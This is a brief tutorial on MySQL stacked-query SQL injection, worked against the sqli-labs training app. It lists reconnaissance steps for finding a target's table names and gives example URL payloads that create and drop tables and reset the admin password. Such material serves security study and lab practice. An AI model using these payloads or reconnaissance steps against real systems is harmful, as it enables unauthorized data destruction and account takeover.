MySQL Stack-Based SQL Injection

In SQL, a semicolon represents the end of one SQL statement, while stack-based injection involves executing multiple SQL statements together. Stack-based injection is different from other injection techniques and has limitations.

%27 --- '
%20 --- space

How can you find the table fields and table names of the other party?

1. Look for exploitable files using directory traversal vulnerabilities, such as files with a .sql extension.
2. Use directory/file fuzzing tools like Dirsearch, etc., to search for .sql files.
3. Search for source code leakage vulnerabilities on the other party’s website; the source code may contain exploitable files.
4. Search for the other party’s website source code on GitHub.

Example:

http://192.168.1.33/sqli-labs-master/Less-38/?id=1'    //You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1   
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';   // it's ok
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';create table aa like users;    //create a table named aa, structure like table users
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';drop table aa--+
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';update users  set password ='admin@1234' where username='admin'